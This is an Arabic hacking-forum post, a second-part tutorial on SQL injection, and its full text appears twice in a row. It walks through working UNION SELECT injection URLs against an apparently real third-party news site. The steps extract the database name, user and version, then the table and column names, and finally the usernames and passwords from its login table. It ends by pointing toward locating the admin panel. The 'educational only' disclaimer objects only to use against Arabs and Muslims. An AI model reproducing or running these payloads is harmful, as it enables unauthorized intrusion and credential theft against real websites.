Omar hcj
08-06-2012, 01:07 AM
بسم الله الرحمن الرحيم
والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
وبسم الله نبدأ اعوذ بالله من الشيطان الرجيم بسم الله الرحمن الرحيم
والحمد لله الذي هدانا الى هذا وما كنا لنهتدي لو لم يهدينا الله
السلام عليكم ورحمة الله وبركاته
ثغرة sql جزء 2
انا شرحت لكم ثغرة sql جزء 1
وقمنا بشرح معرفة الموقع اذا كان مصاب بهذه الثغرة sql ام لا و تعلمنا كيفية معرفة عدد الأعمدة و معرفة الأعمدة المصابة لمشاهدة الموضوع اضغط هنا (http://www.aljyyosh.com/vb/showthread.php?t=36661)
اليوم شرحنا موسع جدا جدا ويجب تشغيل العقل 100% فاليوم الدرس الاخير لمعرفة هذه الثغرة
سنتعلم كيفية استخراج اسم القاعدة و اسم مستخدم القاعدة و إصدار القاعدة إضافة الى ذلك معرفة عدد جداول القاعدة + معرفة اعمدة الجداول + استخراج ال user و pass
الدرس طويل جدا ولكن انا متأكد لن تخرج قبل فهمه ولكن اول شئ عليك صبر و التركيز ولا داعي للتفكير بشرح روابط
نبدأ على بركة لله عز وجل:
اولا)أستخراج أسم القاعدة و إصدار القاعدة واسم مستخدم القاعدة في أمر واحد
لدينا هذا الموقع evt-me.com/newsDetail.php?id=8
وقد قمنا في الدرس السابق معرفة الأعمدة المصابة
ووجدنا ان الأعمدة المصابة هي 2 +3
والان نقوم بحذف العمود 2 من رابط ونضع بدل منه
concat(database(),0x3e,user(),0x3e,@@version)
بمعنا اخر يصبح الرابط
http://www.evt-me.com/newsDetail.php?id=-8 union select 1,concat(database(),0x3e,user(),0x3e,@@version),3, 4,5,6,7--
database():لاستخراج اسم القاعدة:evt_evt
user():استخراج اسم مستخدم القاعدة: evt_badr@localhost
version@@:معرفة إصدار القاعدة:5.1.63-cll
اما بالنسبة ل 0x3e فهي لتفصل بين كل واحد يعني مشان ما يطلعوا كلهم جملة واحد
ثانيا)أستخراج أسماء الجداول من اسم القاعدة
عن طريق الإمر التالي لاحظوو
concat(table_name)
نحذف الامر السابق ونضع الكود الموجود في الاعلى لأستخراج اسماء الجداول من اسم القاعدة
ونضع في نهاية رابط قبل ال - -
from information_schema.tables where table_schema=اسم القاعدة المشفر
لدينا هذا الموقع
لمشاهدة الموقع أضغط هنا (waraxe.us)
هذا موقع لتشفير تضغط اولا على sql char encoder الموجودة في يسار الصفحة
ونكتب اسم القاعدة فيقوم بتشفيرها ثم نضع التشفير بدل من كلمة ((اسم القاعدة المشفر))
اذا يصبح الكود في النهاية
from information_schema.tables where table_schema=0x6576745f657674
تمااااام
اذا الموقع في النهاية هكذا
http://evt-me.com/newsDetail.php?id=-8 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=0x6576745f657674
استخرجنا الان اسماء الجداول من القاعدة غالبا يكون ال username & pass
في جدول Login او user وغيرها ...يعني بتكون واضحة جدا
نجد اسماء الجداول كثار ولكن انا وجدت في هذا الموقع جدول باسم login
اذا هذا الذي فيه ال user و pass
بقي خطوتان فقط ونعرف ال pass & user مممممم
الخطوة الأولى) معرفة اسماء الأغمدة في جدول login اولا نذهب لموقع التشفير و نشفر كلمة Login
ثم نقوم بمحي ما كتبناه في العمود 2
ووضع
group_concat(column_name)
والان نضع في نهاية رابط قبل - - ما يلي
from information_schema.columns where table_name=0x6c6f67696e
0x6c6f67696e اسم الجدول login مشفر اذا نحذف ما كتبناه سابقا و نضع الكود الموجود حالي اي يصبح الرابط في النهاية
http://www.evt-me.com/newsDetail.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=0x6c6f67696e
نجد انه قد استخرج لنا اسماء العواميد كلها
id
pass
username
position
fullname
اكيد انا محتاج username و pass اما fullname فأكيد ما بدي لانو ما بدي اتعرف على admin ههههه
طيب والان الخطوة الاخيرة
تضع بدل العمود المصاب 2 هذا الكود
concat(pass,0x3e,username)
طيب اكيد username و pass حسب ما تجدهم بالجدول
يعني لو جدتهم
user
password
كان بدك تكتب هيك
(
concat(pass,0x3e,user
على حسب ما مكتوب بتكتب تمااام
والان نكتب في نهاية الرابط قبل ال - - ما يلي
from login
طبعا على حسب اسم الجدول يعني لو كان user كان from user
الفكرة وصلت
والان نضغط على Enter ومبروك عليك ال pass&user
والان نذهب لبرنامج الهافج مشان نلاقي مسار لوحة التحكم
طبعا الشباب شارحين عليه كثير واذا طلبتوا مني بعطيك شرح وافي
انا برئ من كل من يستخدم الطريقة ضد العرب و المسلمون
الغرض تعليمي فقط..
الحمد لله الذي علمنا هذا و جعلنا نعلم غيرنا
لا إله الا انت سبحانك إني كنت من الظالمين
للأسئلة و الأستفسارات اترك تعليق يتضمن السؤال وان شاء الله سيتم الرد
او ارسل رسالة على البريد الإلكتروني
[email protected]
facebook:Omar Al Lord
والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
بالله عليك لا تخرج قبل ان تصلي على نبي 3 مرات مو ضروري تكتبهم بتعليق ولكن في قلبك
والحمد لله رب العرش العظيم
وشكرا جزيلا على القراءة
حفظكم الله وهداكم وهدانا
والسلام عليكم ورحمة الله وبركاته
لا تنسونا من الدعاء
تحياتي
والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
وبسم الله نبدأ اعوذ بالله من الشيطان الرجيم بسم الله الرحمن الرحيم
والحمد لله الذي هدانا الى هذا وما كنا لنهتدي لو لم يهدينا الله
السلام عليكم ورحمة الله وبركاته
ثغرة sql جزء 2
انا شرحت لكم ثغرة sql جزء 1
وقمنا بشرح معرفة الموقع اذا كان مصاب بهذه الثغرة sql ام لا و تعلمنا كيفية معرفة عدد الأعمدة و معرفة الأعمدة المصابة لمشاهدة الموضوع اضغط هنا (http://www.aljyyosh.com/vb/showthread.php?t=36661)
اليوم شرحنا موسع جدا جدا ويجب تشغيل العقل 100% فاليوم الدرس الاخير لمعرفة هذه الثغرة
سنتعلم كيفية استخراج اسم القاعدة و اسم مستخدم القاعدة و إصدار القاعدة إضافة الى ذلك معرفة عدد جداول القاعدة + معرفة اعمدة الجداول + استخراج ال user و pass
الدرس طويل جدا ولكن انا متأكد لن تخرج قبل فهمه ولكن اول شئ عليك صبر و التركيز ولا داعي للتفكير بشرح روابط
نبدأ على بركة لله عز وجل:
اولا)أستخراج أسم القاعدة و إصدار القاعدة واسم مستخدم القاعدة في أمر واحد
لدينا هذا الموقع evt-me.com/newsDetail.php?id=8
وقد قمنا في الدرس السابق معرفة الأعمدة المصابة
ووجدنا ان الأعمدة المصابة هي 2 +3
والان نقوم بحذف العمود 2 من رابط ونضع بدل منه
concat(database(),0x3e,user(),0x3e,@@version)
بمعنا اخر يصبح الرابط
http://www.evt-me.com/newsDetail.php?id=-8 union select 1,concat(database(),0x3e,user(),0x3e,@@version),3, 4,5,6,7--
database():لاستخراج اسم القاعدة:evt_evt
user():استخراج اسم مستخدم القاعدة: evt_badr@localhost
version@@:معرفة إصدار القاعدة:5.1.63-cll
اما بالنسبة ل 0x3e فهي لتفصل بين كل واحد يعني مشان ما يطلعوا كلهم جملة واحد
ثانيا)أستخراج أسماء الجداول من اسم القاعدة
عن طريق الإمر التالي لاحظوو
concat(table_name)
نحذف الامر السابق ونضع الكود الموجود في الاعلى لأستخراج اسماء الجداول من اسم القاعدة
ونضع في نهاية رابط قبل ال - -
from information_schema.tables where table_schema=اسم القاعدة المشفر
لدينا هذا الموقع
لمشاهدة الموقع أضغط هنا (waraxe.us)
هذا موقع لتشفير تضغط اولا على sql char encoder الموجودة في يسار الصفحة
ونكتب اسم القاعدة فيقوم بتشفيرها ثم نضع التشفير بدل من كلمة ((اسم القاعدة المشفر))
اذا يصبح الكود في النهاية
from information_schema.tables where table_schema=0x6576745f657674
تمااااام
اذا الموقع في النهاية هكذا
http://evt-me.com/newsDetail.php?id=-8 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=0x6576745f657674
استخرجنا الان اسماء الجداول من القاعدة غالبا يكون ال username & pass
في جدول Login او user وغيرها ...يعني بتكون واضحة جدا
نجد اسماء الجداول كثار ولكن انا وجدت في هذا الموقع جدول باسم login
اذا هذا الذي فيه ال user و pass
بقي خطوتان فقط ونعرف ال pass & user مممممم
الخطوة الأولى) معرفة اسماء الأغمدة في جدول login اولا نذهب لموقع التشفير و نشفر كلمة Login
ثم نقوم بمحي ما كتبناه في العمود 2
ووضع
group_concat(column_name)
والان نضع في نهاية رابط قبل - - ما يلي
from information_schema.columns where table_name=0x6c6f67696e
0x6c6f67696e اسم الجدول login مشفر اذا نحذف ما كتبناه سابقا و نضع الكود الموجود حالي اي يصبح الرابط في النهاية
http://www.evt-me.com/newsDetail.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=0x6c6f67696e
نجد انه قد استخرج لنا اسماء العواميد كلها
id
pass
username
position
fullname
اكيد انا محتاج username و pass اما fullname فأكيد ما بدي لانو ما بدي اتعرف على admin ههههه
طيب والان الخطوة الاخيرة
تضع بدل العمود المصاب 2 هذا الكود
concat(pass,0x3e,username)
طيب اكيد username و pass حسب ما تجدهم بالجدول
يعني لو جدتهم
user
password
كان بدك تكتب هيك
(
concat(pass,0x3e,user
على حسب ما مكتوب بتكتب تمااام
والان نكتب في نهاية الرابط قبل ال - - ما يلي
from login
طبعا على حسب اسم الجدول يعني لو كان user كان from user
الفكرة وصلت
والان نضغط على Enter ومبروك عليك ال pass&user
والان نذهب لبرنامج الهافج مشان نلاقي مسار لوحة التحكم
طبعا الشباب شارحين عليه كثير واذا طلبتوا مني بعطيك شرح وافي
انا برئ من كل من يستخدم الطريقة ضد العرب و المسلمون
الغرض تعليمي فقط..
الحمد لله الذي علمنا هذا و جعلنا نعلم غيرنا
لا إله الا انت سبحانك إني كنت من الظالمين
للأسئلة و الأستفسارات اترك تعليق يتضمن السؤال وان شاء الله سيتم الرد
او ارسل رسالة على البريد الإلكتروني
[email protected]
facebook:Omar Al Lord
والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
بالله عليك لا تخرج قبل ان تصلي على نبي 3 مرات مو ضروري تكتبهم بتعليق ولكن في قلبك
والحمد لله رب العرش العظيم
وشكرا جزيلا على القراءة
حفظكم الله وهداكم وهدانا
والسلام عليكم ورحمة الله وبركاته
لا تنسونا من الدعاء
تحياتي